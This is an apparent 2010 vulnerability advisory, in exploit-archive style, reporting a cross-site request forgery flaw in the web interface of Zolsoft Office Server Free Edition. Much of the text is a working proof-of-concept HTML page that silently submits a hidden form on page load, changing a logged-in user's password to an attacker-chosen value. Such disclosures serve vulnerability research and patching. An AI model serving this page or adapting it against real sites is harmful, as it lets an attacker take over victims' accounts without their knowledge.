zolsoft-xsrf.txt
Posted on 07 May 2010
<!--===============================================================================================# # # # $$$$$$$ $$ $$ $$ $$$$$$ # # $$ __$$ \__| $$ | $$ | $$ __$$ # # $$ | $$ |$$ $$$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$ | $$ / $$ | # # $$$$$$$ |$$ |$$ _____|$$ __$$ $$ __$$ $$ __$$ $$ __$$ $$ __$$ $$ | $$$$$$$$ | # # $$ __$$ $$ |$$$$$$ $$ / $$ |$$ | $$ |$$$$$$$$ |$$ | $$ |$$ / $$ |$$ | $$ __$$ | # # $$ | $$ |$$ | \____$$ $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ |$$ | $$ | $$ | # # $$$$$$$ |$$ |$$$$$$$ |$$$$$$$ |$$ | $$ |$$$$$$$ $$ | $$ |$$$$$$ |$$ | $$ | $$ | # # \_______/ \__|\_______/ $$ ____/ \__| \__| \_______|\__| \__| \______/ \__| \__| \__| # # $$ | # # $$ | Plastics Make It Possible # # \__| # # # #==================================================================================================# # # # Vulnerability............XSRF # # Software.................Zolsoft Office Server Free Edition 2010.0502 # # Download.................http://www.zolsoft.com/downloads/OfficeServer_Free.zip # # Date.....................5/6/10 # # # #==================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #==================================================================================================# # # # ##Description## # # # # A cross-site request forgery vunlerability in the Zoloft Office Server Web UI can be exploited # # to change the password of a user. # # # # # # ##Proof of Concept## --!> <html> <body onload="document.forms[0].submit()"> <form action="http://localhost/options3.htm" method="post"> <input type="hidden" name="PassField1" value="new_password" /> <input type="hidden" name="PassField2" value="new_password" /> </form> </body> </html>
